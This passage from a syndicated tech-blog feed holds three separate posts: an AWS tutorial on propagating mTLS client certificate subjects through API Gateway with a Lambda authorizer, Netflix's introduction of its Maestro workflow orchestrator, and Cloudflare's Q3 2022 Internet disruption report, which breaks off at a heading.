Propagating valid mTLS client certificate identity to downstream services using Amazon API Gateway

Post Syndicated from Eric Johnson original https://aws.amazon.com/blogs/compute/propagating-valid-mtls-client-certificate-identity-to-downstream-services-using-amazon-api-gateway/

This blog was written by Omkar Deshmane, Senior SA, and Anton Aleksandrov, Principal SA, Serverless.

This blog shows how to use Amazon API Gateway with a custom authorizer to process incoming requests, validate the mTLS client certificate, extract the client certificate subject, and propagate it to the downstream application in a base64 encoded HTTP header.

This pattern allows you to terminate mTLS at the edge so downstream applications do not need to perform client certificate validation. With this approach, developers can focus on application logic and offload mTLS certificate management and validation to a dedicated service, such as API Gateway.

Overview

Authentication is one of the core security aspects that you must address when building a cloud application. Successful authentication proves you are who you claim to be. There are various common authentication patterns, such as cookie-based authentication, token-based authentication, or the topic of this blog: certificate-based authentication.

Transport Layer Security (TLS) certificates are at the core of a secure and safe internet. TLS certificates secure the connection between the client and server by encrypting data, ensuring private communication. When using the TLS protocol, the server must prove its identity to the client using a certificate signed by a certificate authority trusted by the client.

Mutual TLS (mTLS) introduces an additional layer of security, in which both the client and server must prove their identities to each other. Developers commonly use mTLS for application-to-application authentication, where digital certificates represent both the client and server apps. We highly recommend decoupling the mTLS implementation from the application business logic so that you do not have to update the application when changing the mTLS configuration. It is a common pattern to implement mTLS authentication and termination in a network appliance at the edge, such as Amazon API Gateway.

In this solution, we show a pattern of using API Gateway with an authorizer implemented with AWS Lambda to validate the mTLS client certificate, extract the client certificate subject, and propagate it to the downstream application in a base64 encoded HTTP header.

While this blog describes how to implement this pattern for identities extracted from mTLS client certificates, you can generalize it and apply it to propagating information obtained via any other means of authentication.

mTLS Sample Application

This blog includes a sample application implemented using the AWS Serverless Application Model (AWS SAM). It creates a demo environment containing resources like API Gateway, a Lambda authorizer, and an Amazon EC2 instance, which simulates the backend application.

The EC2 instance is used for the backend application to mimic common customer scenarios. You can use any other type of compute, such as Lambda functions or containerized applications with Amazon Elastic Container Service (Amazon ECS) or Amazon Elastic Kubernetes Service (Amazon EKS), as a backend application layer as well.

The following diagram shows the solution architecture:

Example architecture diagram

  1. Store the client certificate in a trust store in an Amazon S3 bucket.
  2. The client makes a request to the API Gateway endpoint, supplying the client certificate to establish the mTLS session.
  3. API Gateway retrieves the trust store from the S3 bucket. It validates the client certificate, matches the trusted authorities, and terminates the mTLS connection.
  4. API Gateway invokes the Lambda authorizer, providing the request context and the client certificate information.
  5. The Lambda authorizer extracts the client certificate subject. It performs any necessary custom validation, and returns the extracted subject to API Gateway as a part of the authorization context.
  6. API Gateway injects the subject extracted in the previous step into the integration request HTTP header and sends the request to a downstream endpoint.
  7. The backend application receives the request, extracts the injected subject, and uses it with custom business logic.

Prerequisites and deployment

Some resources created as part of this sample architecture deployment have associated costs, both when running and idle. This includes resources like Amazon Virtual Private Cloud (Amazon VPC), VPC NAT Gateway, and EC2 instances. We recommend deleting the deployed stack after exploring the solution to avoid unexpected costs. See the Cleaning Up section for details.

Refer to the project code repository for instructions to deploy the solution using AWS SAM. The deployment provisions multiple resources, taking several minutes to complete.
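As a rough orientation (the repository README remains the authoritative source for the exact commands and parameters), a typical AWS SAM deployment looks like the following:

# Build the application, then deploy it, answering the guided prompts for stack name, Region, and parameters
sam build
sam deploy --guided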

Following the successful deployment, refer to the RestApiEndpoint variable in the Output section to locate the API Gateway endpoint. Note this value for testing later.

AWS CloudFormation output

Key areas in the sample code

There are two key areas in the sample project code.

In src/authorizer/index.js, the Lambda authorizer code extracts the subject from the client certificate. It returns the value as part of the context object to API Gateway. This allows API Gateway to use this value in the subsequent integration request.

const crypto = require('crypto');

exports.handler = async (event) => {
    console.log ('> handler', JSON.stringify(event, null, 4));

    const clientCertPem = event.requestContext.identity.clientCert.clientCertPem;
    const clientCert = new crypto.X509Certificate(clientCertPem);
    const clientCertSub = clientCert.subject.replaceAll('\n', ',');

    const response = {
        principalId: clientCertSub,
        context: { clientCertSub },
        policyDocument: {
            Version: '2012-10-17',
            Statement: [{
                Action: 'execute-api:Invoke',
                Effect: 'Allow',
                Resource: event.methodArn
            }]
        }
    };

    console.log('Authorizer Response', JSON.stringify(response, null, 4));
    return response;
};

In template.yaml, API Gateway injects the client certificate subject extracted previously by the Lambda authorizer into the integration request as the X-Client-Cert-Sub HTTP header. X-Client-Cert-Sub is a custom header name; you can choose any other custom header name instead.

SayHelloGetMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      AuthorizationType: CUSTOM
      AuthorizerId: !Ref CustomAuthorizer
      HttpMethod: GET
      ResourceId: !Ref SayHelloResource
      RestApiId: !Ref RestApi
      Integration:
        Type: HTTP_PROXY
        ConnectionType: VPC_LINK
        ConnectionId: !Ref VpcLink
        IntegrationHttpMethod: GET
        Uri: !Sub 'http://${NetworkLoadBalancer.DNSName}:3000/'
        RequestParameters:
          'integration.request.header.X-Client-Cert-Sub': 'context.authorizer.clientCertSub' 

Testing the example

You create a client key and certificate during the deployment, which are stored in the /certificates directory. Use the curl command to make a request to the REST API endpoint using these files.

curl --cert certificates/client.pem --key certificates/client.key \
<use the RestApiEndpoint found in CloudFormation output>

Example flow diagram

The client request to API Gateway uses mTLS with a client certificate supplied for mutual TLS authentication. API Gateway uses the Lambda authorizer to extract the certificate subject and injects it into the integration request.

The HTTP server runs on the EC2 instance, simulating the backend application. It accepts the incoming request and echoes it back, supplying request headers as part of the response body. The HTTP response received from the backend application contains a simple message and a copy of the request headers sent from API Gateway to the backend.

One of these headers is x-client-cert-sub, which carries the certificate subject. Verify that its value matches the Common Name you provided when generating the client certificate.
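If you want to confirm which Common Name the client certificate carries, you can inspect it locally with openssl before comparing it against the header value. This assumes the PEM-encoded certificate created in the /certificates directory during deployment:

# Print the subject of the client certificate, including its Common Name (CN)
openssl x509 -in certificates/client.pem -noout -subject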

Response example

API Gateway validated the mTLS client certificate, used the Lambda authorizer to extract the subject common name from the certificate, and forwarded it to the downstream application.

Cleaning up

Use the sam delete command in the api-gateway-certificate-propagation directory to delete the sample application infrastructure:

sam delete

You can also refer to the project code repository for the clean-up instructions.

Conclusion

This blog shows how to use API Gateway with a Lambda authorizer for mTLS client certificate validation, custom field extraction, and downstream propagation to backend systems. This pattern allows you to terminate mTLS at the edge so that downstream applications are not responsible for client certificate validation.

For additional documentation, refer to Using API Gateway with Lambda Authorizer. Download the sample code from the project code repository. For more serverless learning resources, visit Serverless Land.

Orchestrating Data/ML Workflows at Scale With Netflix Maestro

Post Syndicated from Netflix Technology Blog original https://netflixtechblog.com/orchestrating-data-ml-workflows-at-scale-with-netflix-maestro-aaa2b41b800c

by Jun He, Akash Dwivedi, Natallia Dzenisenka, Snehal Chennuru, Praneeth Yenugutala, Pawan Dixit

At Netflix, Data and Machine Learning (ML) pipelines are widely used and have become central to the business, representing diverse use cases that go beyond recommendations, predictions, and data transformations. A large number of batch workflows run daily to serve various business needs. These include ETL pipelines, ML model training workflows, batch jobs, etc. As big data and ML became more prevalent and impactful, the scalability, reliability, and usability of the orchestration ecosystem have become increasingly important for our data scientists and the company.

In this blog post, we introduce and share learnings on Maestro, a workflow orchestrator that can schedule and manage workflows at a massive scale.

Motivation

Scalability and usability are essential to enable large-scale workflows and support a wide range of use cases. Our existing orchestrator (Meson) has worked well for several years. It schedules around 70,000 workflows and half a million jobs per day. Due to its popularity, the number of workflows managed by the system has grown exponentially. We started seeing signs of scale issues, like:

  • Slowness during peak traffic moments like 12 AM UTC, leading to increased operational burden. The scheduler on-call has to closely monitor the system during non-business hours.
  • Meson was based on a single leader architecture with high availability. As the usage increased, we had to vertically scale the system to keep up and were approaching AWS instance type limits.

With workflow volume growing by more than 100% a year over the past few years, the need for a scalable data workflow orchestrator has become paramount for Netflix’s business needs. After surveying the current landscape of workflow orchestrators, we decided to develop a next-generation system that can scale horizontally to spread jobs across a cluster consisting of hundreds of nodes. It addresses the key challenges we face with Meson and achieves operational excellence.

Challenges in Workflow Orchestration

Scalability

The orchestrator has to schedule hundreds of thousands of workflows and millions of jobs every day, and operate with a strict SLO of less than one minute of scheduler-introduced delay even when there are spikes in traffic. At Netflix, the peak traffic load can be a few orders of magnitude higher than the average load. For example, a lot of our workflows run around midnight UTC. Hence, the system has to withstand bursts in traffic while still maintaining the SLO requirements. Additionally, we would like to have a single scheduler cluster to manage most user workflows for operational and usability reasons.

Another dimension of scalability to consider is the size of the workflow. In the data domain, it is common to have a super large number of jobs within a single workflow. For example, a workflow to backfill hourly data for the past five years can lead to 43800 jobs (24 * 365 * 5), each of which processes data for an hour. Similarly, ML model training workflows usually consist of tens of thousands of training jobs within a single workflow. Those large-scale workflows might create hotspots and overwhelm the orchestrator and downstream systems. Therefore, the orchestrator has to manage a workflow consisting of hundreds of thousands of jobs in a performant way, which is also quite challenging.

Usability

Netflix is a data-driven company, where key decisions are driven by data insights, from the pixel color used on the landing page to the renewal of a TV-series. Data scientists, engineers, non-engineers, and even content producers all run their data pipelines to get the necessary insights. Given the diverse backgrounds, usability is a cornerstone of a successful orchestrator at Netflix.

We would like our users to focus on their business logic and let the orchestrator solve cross-cutting concerns like scheduling, processing, error handling, security, etc. It needs to provide different levels of abstraction for solving similar problems: high-level abstractions to cater to non-engineers, and low-level ones for engineers to solve their specific problems. It should also provide all the knobs for configuring workflows to suit different needs. In addition, it is critical for the system to be debuggable and to surface all errors for users to troubleshoot, as this improves the user experience and reduces the operational burden.

Providing abstractions for users is also needed to save valuable time on creating workflows and jobs. We want users to rely on shared templates and reuse their workflow definitions across their team, saving time and effort on creating the same functionality. Using job templates across the company also helps with upgrades and fixes: when a change is made to a template, it is automatically applied to all workflows that use it.

However, usability is challenging because it is often opinionated. Different users have different preferences and might ask for different features. Sometimes users ask for opposing features, or for niche capabilities that might not be useful to a broader audience.

Introducing Maestro

Maestro is the next generation Data Workflow Orchestration platform to meet the current and future needs of Netflix. It is a general-purpose workflow orchestrator that provides a fully managed workflow-as-a-service (WAAS) to the data platform at Netflix. It serves thousands of users, including data scientists, data engineers, machine learning engineers, software engineers, content producers, and business analysts, for various use cases.

Maestro is highly scalable and extensible to support existing and new use cases and offers enhanced usability to end users. Figure 1 shows the high-level architecture.

Figure 1. Maestro high level architecture

In Maestro, a workflow is a DAG (directed acyclic graph) of individual units of job definition called Steps. Steps can have dependencies, triggers, workflow parameters, metadata, step parameters, configurations, and branches (conditional or unconditional). In this blog, we use step and job interchangeably. A workflow instance is an execution of a workflow; similarly, an execution of a step is called a step instance. Instance data include the evaluated parameters and other information collected at runtime to provide different kinds of execution insights. The system consists of three main microservices, which we expand upon in the following sections.

Maestro ensures the business logic is run in isolation. Maestro launches a unit of work (a.k.a. a Step) in a container and ensures the container is launched with the user’s or application’s identity. Launching with identity ensures the work runs on behalf of that user or application; the identity is later used by downstream systems to validate whether an operation is allowed. For example, the user/application identity is checked by the data warehouse to validate whether a table read or write is allowed.

Workflow Engine

The workflow engine is the core component. It manages workflow definitions, the lifecycle of workflow instances, and step instances. It provides rich features to support:

  • Any valid DAG patterns
  • Popular data flow constructs like sub workflow, foreach, conditional branching etc.
  • Multiple failure modes to handle step failures with different error retry policies
  • Flexible concurrency control to throttle the number of executions at workflow/step level
  • Step templates for common job patterns like running a Spark query or moving data to Google sheets
  • Parameter code injection using a customized expression language
  • Workflow definition and ownership management
  • Timeline including all state changes and related debug info

We use the Netflix open source project Conductor as a library to manage the workflow state machine in Maestro. It ensures that each step defined in a workflow is enqueued and dequeued with an at-least-once guarantee.

Time-Based Scheduling Service

The time-based scheduling service starts new workflow instances at the scheduled time specified in workflow definitions. Users can define the schedule using a cron expression or periodic schedule templates like hourly, weekly, etc. This service is lightweight and provides an at-least-once scheduling guarantee. The Maestro engine service deduplicates the triggering requests to achieve an exactly-once guarantee when scheduling workflows.

Time-based triggering is popular due to its simplicity and ease of management, but sometimes it is not efficient. For example, a daily workflow should process the data when the data partition is ready, not always at midnight. Therefore, on top of manual and time-based triggering, we also provide event-driven triggering.

Signal Service

Maestro supports event-driven triggering via signals, which are messages carrying information such as parameter values. Signal triggering is efficient and accurate because we don’t waste resources checking whether the workflow is ready to run; instead, we only execute the workflow when a condition is met.

Signals are used in two ways:

  • A trigger to start new workflow instances
  • A gating function to conditionally start a step (e.g., data partition readiness)

The signal service’s goals are to:

  • Collect and index signals
  • Register and handle workflow trigger subscriptions
  • Register and handle the step gating functions
  • Capture the lineage of workflow triggers and steps unblocked by a signal

Figure 2. Signal service high level architecture

The Maestro signal service consumes all the signals from different sources, e.g., warehouse table updates, S3 events, or a workflow releasing a signal, and then generates the corresponding triggers by correlating a signal with its subscribed workflows. In addition to the transformation between external signals and workflow triggers, this service is also responsible for step dependencies, looking up the received signals in its history. Like the scheduling service, the signal service together with the Maestro engine achieves exactly-once triggering guarantees.

The signal service also provides signal lineage, which is useful in many cases. For example, a table updated by a workflow could lead to a chain of downstream workflow executions. Because the workflows involved are usually owned by different teams, signal lineage helps the upstream and downstream workflow owners see who depends on whom.

Orchestration at Scale

All services in the Maestro system are stateless and can be horizontally scaled out. All requests are processed via distributed queues for message passing. With this shared-nothing architecture, Maestro can horizontally scale to manage the states of millions of workflow and step instances at the same time.

CockroachDB is used for persisting workflow definitions and instance state. We chose CockroachDB as it is an open-source distributed SQL database that provides strong consistency guarantees that can be scaled horizontally without much operational overhead.

It is hard to support super large workflows in general. For example, a workflow definition can explicitly define a DAG consisting of millions of nodes, and with that many nodes in a DAG, the UI cannot render it well. We have to enforce some constraints while still supporting valid use cases consisting of hundreds of thousands (or even millions) of step instances in a workflow instance.

Based on our findings and user feedback, we observed that in practice:

  • Users don’t want to manually write the definitions for thousands of steps in a single workflow definition, which is hard to manage and navigate in the UI. When such a use case exists, it is always feasible to decompose the workflow into smaller sub-workflows.
  • Users expect to repeatedly run a certain part of the DAG hundreds of thousands (or even millions) of times with different parameter settings in a given workflow instance. So at runtime, a workflow instance might include millions of step instances.

Therefore, we enforce a workflow DAG size limit (e.g. 1K) and provide a foreach pattern that allows users to define a sub DAG within a foreach block and iterate the sub DAG with a much larger limit (e.g. 100K). Note that a foreach can be nested within another foreach, so users can run millions or billions of steps in a single workflow instance.
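To put those limits in perspective, a single 100K-iteration foreach whose sub DAG contains ten steps already yields one million step instances at runtime, and nesting one 100K foreach inside another pushes the total into the billions.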

In Maestro, foreach itself is a step in the original workflow definition. A foreach is internally treated as another workflow, which scales the same way as any other Maestro workflow based on the number of step executions in the foreach loop. The execution of the sub DAG within the foreach is delegated to separate workflow instances. The foreach step then monitors and collects the status of those foreach workflow instances, each of which manages the execution of one iteration.

Figure 3. Maestro’s scalable foreach design to support super large iterations

With this design, the foreach pattern supports sequential and nested loops with high scalability. It is easy to manage and troubleshoot, as users can see the overall loop status at the foreach step or view each iteration separately.

Workflow Platform for Everyone

We aim to make Maestro user friendly and easy to learn for users with different backgrounds. We make minimal assumptions about users’ proficiency in programming languages: they can bring their business logic in multiple ways, including, but not limited to, a bash script, a Jupyter notebook, a Java jar, a Docker image, a SQL statement, or a few clicks in the UI using parameterized workflow templates.

User Interfaces

Maestro provides multiple domain specific languages (DSLs), including YAML, Python, and Java, for end users to define their workflows, which are decoupled from their business logic. Users can also talk directly to the Maestro API to create workflows using the JSON data model. We found that human-readable DSLs are popular and play an important role in supporting different use cases. The YAML DSL is the most popular due to its simplicity and readability.

Here is an example workflow defined by different DSLs.

Figure 4. An example workflow defined by YAML, Python, and Java DSLs

Additionally, users can also generate certain types of workflows in the UI or use other libraries, e.g.:

  • In the Notebook UI, users can directly schedule the chosen notebook to run periodically.
  • In the Maestro UI, users can directly schedule data movement from one source (e.g. a data table or a spreadsheet) to another on a periodic basis.
  • Users can use the Metaflow library to create workflows in Maestro that execute DAGs consisting of arbitrary Python code.

Parameterized Workflows

Often, users want to define a dynamic workflow that adapts to different scenarios. Based on our experience, a completely dynamic workflow is less favorable: it is hard to maintain and troubleshoot. Instead, Maestro provides three features to help users define a parameterized workflow:

  • Conditional branching
  • Sub-workflow
  • Output parameters

Instead of dynamically changing the workflow DAG at runtime, users can define those changes as sub-workflows and then invoke the appropriate sub-workflow at runtime, because the sub-workflow ID is a parameter that is evaluated at runtime. Additionally, using output parameters, users can produce different results from an upstream step and then iterate through them within a foreach, pass them to a sub-workflow, or use them in downstream steps.

Here is an example (using the YAML DSL) of a backfill workflow with two steps. Step1 computes the backfill ranges and returns the dates. Next, the foreach step uses the dates from step1 to create the foreach iterations. Finally, each of the backfill jobs gets a date from the foreach and backfills the data based on that date.

Workflow:
  id: demo.pipeline
  jobs:
    - job:
        id: step1
        type: NoOp
        '!dates': return new int[]{20220101,20220102,20220103}; #SEL
    - foreach:
        id: step2
        params:
          date: ${dates@step1} #reference a upstream step parameter
        jobs:
          - job:
              id: backfill
              type: Notebook
              notebook:
                input_path: s3://path/to/notebook.ipynb
                arg1: $date #pass the foreach parameter into notebook

Figure 5. An example of using parameterized workflow for backfill data

The parameter system in Maestro is completely dynamic, with code injection support. Users can write code in Java syntax as the parameter definition. We developed our own secured expression language (SEL) to ensure security. It only exposes limited functionality and includes additional checks (e.g., on the number of iterations in a loop statement) in the language parser.

Execution Abstractions

Maestro provides multiple levels of execution abstraction. Users can choose to use a provided step type and set its parameters. This helps to encapsulate the business logic of commonly used operations, making it very easy for users to create jobs. For example, for the Spark step type, all users have to do is specify the needed parameters, like the Spark SQL query and memory requirements, and Maestro does everything behind the scenes to create the step. If we have to make a change in the business logic of a certain step, we can do so seamlessly for all users of that step type.

If the provided step types are not enough, users can also develop their own business logic in a Jupyter notebook and then pass it to Maestro. Advanced users can develop their own well-tuned Docker image and let Maestro handle the scheduling and execution.

Additionally, we abstract common functions and reusable patterns from various use cases and add them to Maestro in a loosely coupled way by introducing job templates, which are parameterized notebooks. This is different from step types, as templates provide a combination of various steps. Advanced users also leverage this feature to ship common patterns to their own teams. While creating a new template, users can define the list of required and optional parameters with their types and register the template with Maestro. Maestro validates the parameters and types at push and run time. In the future, we plan to extend this functionality to make it very easy for users to define templates for their teams and for all employees. In some cases, sub-workflows are also used to define common sub DAGs to achieve multi-step functions.

Moving Forward

We are taking big data orchestration to the next level and constantly solving new problems and challenges, so please stay tuned. If you are motivated to solve large-scale orchestration problems, please join us; we are hiring.


Orchestrating Data/ML Workflows at Scale With Netflix Maestro was originally published in Netflix TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Internet disruptions overview for Q3 2022

Post Syndicated from David Belson original https://blog.cloudflare.com/q3-2022-internet-disruption-summary/


Cloudflare operates in more than 275 cities in over 100 countries, where we interconnect with over 10,000 network providers in order to provide a broad range of services to millions of customers. The breadth of both our network and our customer base provides us with a unique perspective on Internet resilience, enabling us to observe the impact of Internet disruptions. In many cases, these disruptions can be attributed to a physical event, while in other cases, they are due to an intentional government-directed shutdown. In this post, we review selected Internet disruptions observed by Cloudflare during the third quarter of 2022, supported by traffic graphs from Cloudflare Radar and other internal Cloudflare tools, and grouped by associated cause or common geography. The new Cloudflare Radar Outage Center provides additional information on these, and other historical, disruptions.

Government directed shutdowns

Unfortunately, for the last decade, governments around the world have turned to shutting down the Internet as a means of controlling or limiting communication among citizens and with the outside world. In the third quarter, this was an all too popular cause of observed disruptions, impacting countries and regions in Africa, the Middle East, Asia, and the Caribbean.

Iraq

As mentioned in our Q2 summary blog post, on June 27, the Kurdistan Regional Government in Iraq began to implement twice-weekly (Mondays and Thursdays) multi-hour regional Internet shutdowns over the following four weeks, intended to prevent cheating on high school final exams. As seen in the figure below, these shutdowns occurred as expected each Monday and Thursday through July 21, with the exception of July 21 itself. They impacted three governorates in Iraq, and lasted from 0630–1030 local time (0330–0730 UTC) each day.

Erbil, Sulaymaniyah, and Duhok Governorates, Iraq. (Source: Map data ©2022 Google, Mapa GISrael)

Cuba

In Cuba, an Internet disruption was observed between 0055-0150 local time (0455-0550 UTC) on July 15 amid reported anti-government protests in Los Palacios and Pinar del Rio.

Los Palacios and Pinar del Rio, Cuba. (Source: Map data ©2022 INEGI)

Closing out the quarter, another significant disruption was observed in Cuba, reportedly in response to protests over the lack of electricity in the wake of Hurricane Ian. A complete outage is visible in the figure below between 2030 on September 29 and 0315 on September 30 local time (0030-0715 UTC on September 30).


Afghanistan

Telecommunications services were reportedly shut down in part of Kabul, Afghanistan on the morning of August 8. The figure below shows traffic dropping starting around 0930 local time (0500 UTC), recovering 11 hours later, around 2030 local time (1600 UTC).

Kabul, Afghanistan. (Source: Map data ©2022 Google)

Sierra Leone

Protests in Freetown, Sierra Leone over the rising cost of living likely drove the Internet disruptions observed within the country on August 10 & 11. The first one occurred between 1200-1400 local time (1200-1400 UTC) on August 10. While this outage is believed to have been government directed as a means of quelling the protests, Zoodlabs, which manages Sierra Leone Cable Limited, claimed that the outage was the result of “emergency technical maintenance on some of our international routes”.

A second longer outage was observed between 0100-0730 local time (0100-0730 UTC) on August 11, as seen in the figure below. These shutdowns follow similar behavior in years past, where Internet connectivity was shut off following elections within the country.

Freetown, Sierra Leone (Source: Map data ©2022 Google, Inst. Geogr. Nacional)

Region of Somaliland

In Somaliland, local authorities reportedly cut off Internet service on August 11 ahead of scheduled opposition demonstrations. The figure below shows a complete Internet outage in Woqooyi Galbeed between 0645-1355 local time (0345-1055 UTC).

Woqooyi Galbeed, Region of Somaliland. (Source: Map data ©2022 Google, Mapa GISrael)

At a network level, the observed outage was due to a loss of traffic from AS37425 (SomCable) and AS37563 (Somtel), as shown in the figures below. Somtel is a mobile services provider, while SomCable is focused on providing wireline Internet access.


India

India is no stranger to government-directed Internet shutdowns, taking such action hundreds of times over the last decade. This may be changing in the future, however, as the country’s Supreme Court ordered the Ministry of Electronics and Information Technology (MEITY) to reveal the grounds upon which it imposes or approves Internet shutdowns. Until this issue is resolved, we will continue to see regional shutdowns across the country.

One such example occurred in Assam, where mobile Internet connectivity was shut down to prevent cheating on exams. The figure below shows that these shutdowns were implemented twice daily on August 21 and August 28. While the shutdowns were officially scheduled to take place between 1000-1200 and 1400-1600 local time (0430-0630 and 0830-1030 UTC), some providers reportedly suspended connectivity starting in the early morning.

Assam, India. (Source: Map data ©2022 Google, TMap Mobility)

Iran

In late September, protests and demonstrations erupted across Iran in response to the death of Mahsa Amini. Amini was a 22-year-old woman from the Kurdistan Province of Iran who was arrested on September 13, 2022, in Tehran by Iran’s “morality police”, a unit that enforces strict dress codes for women. She died on September 16 while in police custody. In response to these protests and demonstrations, Internet connectivity across the country experienced multiple waves of disruptions.

In addition to multi-hour outages in Sanandaj and Tehran province on September 19 and 21 that were covered in a blog post, three mobile network providers — AS44244 (Irancell), AS57218 (RighTel), and AS197207 (MCCI) — implemented daily Internet “curfews”, generally taking place between 1600 and midnight local time (1230-2030 UTC), although the start times varied on several days. These regular shutdowns are clearly visible in the figure below, and continued into early October.

Sanandaj and Tehran, Iran. (Source: Map data ©2022 Google)

As noted in the blog post, access to DNS-over-HTTPS (DoH) and DNS-over-TLS (DoT) services was also blocked in Iran starting on September 20, and in a move that is likely related, connections over HTTP/3 and QUIC were blocked starting on September 22, as shown in the figure below from Cloudflare Radar.


Natural disasters

Natural disasters such as earthquakes and hurricanes wreak havoc on impacted geographies, often causing loss of life, as well as significant structural damage to buildings of all types. Infrastructure damage is also extremely common, with widespread loss of both electrical power and telecommunications infrastructure.

Papua New Guinea

On September 11, a 7.6 magnitude earthquake struck Papua New Guinea, resulting in landslides, cracked roads, and Internet connectivity disruptions. Traffic to the country dropped by 26% just after 1100 local time (0100 UTC). The figure below shows that traffic volumes remained lower into the following day as well. An announcement from PNG DataCo, a local provider, noted that the earthquake “has affected the operations of the Kumul Submarine Cable Network (KSCN) Express Link between Port Moresby and Madang and the PPC-1 Cable between Madang and Sydney.” This damage, they stated, resulted in the observed outage and degraded service.


Mexico

Just over a week later, a 7.6 magnitude earthquake struck the Colima-Michoacan border region in Mexico at 1305 local time (1805 UTC). As shown in the figure below, traffic dropped over 50% in the impacted states immediately after the quake occurred, but recovered fairly quickly, returning to normal levels by around 1600 local time (2100 UTC).

Earthquake epicenter, 35 km SW of Aguililla, Mexico. (Source: Map data ©2022 INEGI)

Hurricane Fiona

Several major hurricanes plowed their way up the east coast of North America in late September, causing significant damage and resulting in Internet disruptions. On September 18, island-wide power outages caused by Hurricane Fiona disrupted Internet connectivity in Puerto Rico. As the figure below illustrates, it took over 10 days for traffic volumes to return to expected levels. Luma Energy, the local power company, kept customers apprised of repair progress through regular updates to its Twitter feed.


Two days later, Hurricane Fiona slammed the Turks and Caicos islands, causing flooding and significant damage, as well as disrupting Internet connectivity. The figure below shows traffic starting to drop below expected levels around 1245 local time (1645 UTC) on September 20. Recovery took approximately a day, with traffic returning to expected levels around 1100 local time (1500 UTC) on September 21.


Continuing to head north, Hurricane Fiona ultimately made landfall in the Canadian province of Nova Scotia on September 24, causing power outages and disrupting Internet connectivity. The figure below shows that the most significant impact was seen in Nova Scotia. As Nova Scotia Power worked to restore service to customers, traffic volumes gradually increased, as seen in the figure below. By September 29, traffic volumes in the province had returned to normal levels.


Hurricane Ian

On September 28, Hurricane Ian made landfall in Florida, and was the strongest hurricane to hit Florida since Hurricane Michael in 2018. With over four million customers losing power due to damage from the storm, a number of cities experienced associated Internet disruptions. Traffic from impacted cities dropped significantly starting around 1500 local time (1900 UTC), and as the figure below shows, recovery has been slow, with traffic levels still not back to pre-storm volumes more than two weeks later.

Sarasota, Naples, Fort Myers, Cape Coral, North Port, Port Charlotte, Punta Gorda, and Marco Island, Florida. (Source: Map data ©2022 Google, INEGI)

Power outages

In addition to power outages caused by earthquakes and hurricanes, a number of other power outages caused multi-hour Internet disruptions during the third quarter.

Iran

A reported power outage in a key data center building disrupted Internet connectivity for customers of local ISP Shatel in Iran on July 25. As seen in the figure below, traffic dropped significantly at approximately 0715 local time (0345 UTC). Recovery began almost immediately, with traffic nearing expected levels by 0830 local time (0500 UTC).


Venezuela

Electrical issues frequently disrupt Internet connectivity in Venezuela, and the independent @vesinfiltro Twitter account tracks these events closely. One such example occurred on August 9, when electrical issues disrupted connectivity across multiple states, including Mérida, Táchira, Barinas, Portuguesa, and Estado Trujillo. The figure below shows evidence of two disruptions, the first around 1340 local time (1740 UTC) and the second a few hours later, starting at around 1615 local time (2015 UTC). In both cases, traffic volumes appeared to recover fairly quickly.

Mérida, Táchira, Barinas, Portuguesa, and Estado Trujillo, Venezuela. (Source: Map data ©2022 Google. INEGI)

Oman

On September 5, a power outage in Oman impacted energy, aviation, and telecommunications services. The latter is evident in the figure below, which shows the country’s traffic volume dropping nearly 60% when the outage began just before 1515 local time (0915 UTC). Although authorities claimed that “the electricity network would be restored within four hours,” traffic did not fully return to normal levels until 0400 local time on September 6 (2200 UTC on September 5), approximately 11 hours later.


Ukraine

Over the last seven-plus months of war in Ukraine, we have observed multiple Internet disruptions due to infrastructure damage and power outages related to the fighting. We have covered these disruptions in our first and second quarter summary blog posts, and continue to do so on our @CloudflareRadar Twitter account as they occur. Power outages were behind Internet disruptions observed in Kharkiv on September 11, 12, and 13.

The figure below shows that the first disruption started around 2000 local time (1700 UTC) on September 11. This near-complete outage lasted just over 12 hours, with traffic returning to normal levels around 0830 local time (0530 UTC) on the 12th. However, later that day, another partial outage occurred, with a 50% traffic drop seen at 1330 local time (1030 UTC). This one was much shorter, with recovery starting approximately an hour later. Finally, a nominal disruption is visible at 0800 local time (0500 UTC) on September 13, with lower than expected traffic volumes lasting for around five hours.


Cable damage

Damage to both terrestrial and submarine cables has caused many Internet disruptions over the years. The recent alleged sabotage of the sub-sea Nord Stream natural gas pipelines has brought an increasing level of interest from European media (including Swiss and French publications) around just how important submarine cables are to the Internet, and an increasing level of concern among policymakers about the safety of these cable systems and the potential impact of damage to them. However, the three instances of cable damage reviewed below are all related to terrestrial cable.

Iran

On August 1, a reported “fiber optic cable” problem caused by a fire in a telecommunications manhole disrupted connectivity across multiple network providers, including AS31549 (Aria Shatel), AS58224 (TIC), AS43754 (Asiatech), AS44244 (Irancell), and AS197207 (MCCI). The disruption started around 1215 local time (0845 UTC) and lasted for approximately four hours. Because it impacted a number of major wireless and wireline networks, the impact was visible at a country level as well, as seen in the figure below.


Pakistan

Cable damage due to heavy rains and flooding caused several Internet disruptions in Pakistan in August. The first notable disruption occurred on August 19, starting around 0700 local time (0200 UTC), and lasted just over six and a half hours. On August 22, another significant disruption is also visible, starting at 2250 local time (1750 UTC), with a further drop at 0530 local time (0030 UTC) on the 23rd. The second, more significant drop was brief, lasting only 45 minutes, after which traffic began to recover.


Haiti

Amidst protests over fuel price hikes, fiber cuts in Haiti caused Internet outages on multiple network providers. Starting at 1500 local time (1900 UTC) on September 14, traffic on AS27759 (Access Haiti) fell to zero. According to a (translated) Twitter post from the provider, they had several fiber optic cables that were cut in various areas of the country, and blocked roads made it “really difficult” for their technicians to reach the problem areas. Repairs were eventually made, with traffic starting to increase again around 0830 local time (1230 UTC) on September 15, as shown in the figure below.


Access Haiti provides AS27774 (Haiti Networking Group) with Internet connectivity (as an “upstream” provider), so the fiber cut impacted their connectivity as well, causing the outage shown in the figure below.


Technical problems

As a heading, “technical problems” can be a catch-all, referring to multiple types of issues, including misconfigurations and routing problems. However, it is also sometimes the official explanation given by a government or telecommunications company for an observed Internet disruption.

Rogers

Arguably the most significant Internet disruption so far this year took place on AS812 (Rogers), one of Canada’s largest Internet service providers. At around 0845 UTC on July 8, a near complete loss of traffic was observed, as seen in the figure below.


The figure below shows that small amounts of traffic were seen from the network over the course of the outage, but it took nearly 24 hours for traffic to return to normal levels.


A notice posted by the Rogers CEO explained that “We now believe we’ve narrowed the cause to a network system failure following a maintenance update in our core network, which caused some of our routers to malfunction early Friday morning. We disconnected the specific equipment and redirected traffic, which allowed our network and services to come back online over time as we managed traffic volumes returning to normal levels.” A Cloudflare blog post covered the Rogers outage in real-time, highlighting related BGP activity and small increases of traffic.

Chad

